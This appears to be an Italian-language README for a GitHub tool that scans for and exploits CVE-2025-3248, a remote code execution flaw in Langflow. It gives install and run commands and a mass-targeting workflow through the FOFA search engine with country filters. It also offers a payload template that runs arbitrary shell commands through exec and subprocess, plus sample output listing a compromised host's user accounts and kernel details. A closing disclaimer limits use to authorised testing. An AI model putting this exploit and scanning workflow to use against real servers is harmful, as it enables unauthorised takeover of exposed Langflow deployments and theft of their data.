
Uno scanner di vulnerabilità per CVE-2025-3248 nelle applicazioni Langflow. Uno strumento per scansionare le vulnerabilità CVE-2025-3248 nelle applicazioni Langflow.
中文 | English
Uno scanner di vulnerabilità per CVE-2025-3248 nelle applicazioni Langflow.
git clone https://github.com/xuemian168/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
source venv/bin/active
pip install -r requirements.txt
# After you finish editing
mv .env.example .env
python main.py -t https://target.com
python main.py --fofa-email [email protected] --fofa-key your_api_key
-t, --target: URL del target da scansionare--fofa-email: Email API FOFA--fofa-key: Chiave API FOFA--fofa-query: Query di ricerca FOFA (predefinita: 'app="LOGSPACE-LangFlow"')--country: Filtra i risultati per codice paese (es. CN, US)--max-pages: Numero massimo di pagine FOFA da recuperare (predefinito: 5)--page-size: Risultati per pagina (predefinito: 100)--timeout: Timeout della richiesta in secondi (predefinito: 10)--no-verify: Disabilita la verifica SSL--threads: Numero di thread per la scansione simultanea (predefinito: 5)-f, --file: File Python personalizzato da usare come payloadPuoi creare payload personalizzati creando un file Python:
def test(cd=exec('raise Exception(__import__("subprocess").check_output("your_command", shell=True))')):
pass
Quindi usalo con:
python main.py -t https://target.com -f your_payload.py
[+] User Accounts:
root UID:0 GID:0 Home:/root Shell:/bin/bash
daemon UID:1 GID:1 Home:/usr/sbin Shell:/usr/sbin/nologin
bin UID:2 GID:2 Home:/bin Shell:/usr/sbin/nologin
sys UID:3 GID:3 Home:/dev Shell:/usr/sbin/nologin
sync UID:4 GID:65534 Home:/bin Shell:/bin/sync
games UID:5 GID:60 Home:/usr/games Shell:/usr/sbin/nologin
man UID:6 GID:12 Home:/var/cache/man Shell:/usr/sbin/nologin
lp UID:7 GID:7 Home:/var/spool/lpd Shell:/usr/sbin/nologin
mail UID:8 GID:8 Home:/var/mail Shell:/usr/sbin/nologin
news UID:9 GID:9 Home:/var/spool/news Shell:/usr/sbin/nologin
uucp UID:10 GID:10 Home:/var/spool/uucp Shell:/usr/sbin/nologin
proxy UID:13 GID:13 Home:/bin Shell:/usr/sbin/nologin
www-data UID:33 GID:33 Home:/var/www Shell:/usr/sbin/nologin
backup UID:34 GID:34 Home:/var/backups Shell:/usr/sbin/nologin
list UID:38 GID:38 Home:/var/list Shell:/usr/sbin/nologin
irc UID:39 GID:39 Home:/run/ircd Shell:/usr/sbin/nologin
_apt UID:42 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
nobody UID:65534 GID:65534 Home:/nonexistent Shell:/usr/sbin/nologin
user UID:1000 GID:0 Home:/app/data Shell:/bin/sh
[+] System Details:
Linux ********** 6.8.0-1020-aws #22-Ubuntu SMP Thu Nov 21 **:**:** UTC 2025 x86_64 GNU/Linux
⚠️ Dichiarazione di non responsabilità Questo strumento è destinato esclusivamente a scopi legali. È progettato per scopi educativi, test di sicurezza interni alle aziende o per l'uso in ambienti autorizzati. È severamente vietato utilizzare questo strumento su qualsiasi sistema, rete o dispositivo non autorizzato; in caso contrario, potrebbe violare leggi e regolamenti pertinenti.
Gli utenti si assumono tutte le responsabilità legali per le proprie azioni. L'autore e i collaboratori non sono responsabili di eventuali perdite, fughe di dati o conseguenze legali causate dall'uso improprio di questo strumento.
⚠️ Non utilizzare per attacchi illegali. Non tentare di distribuire o eseguire questo strumento su sistemi non autorizzati.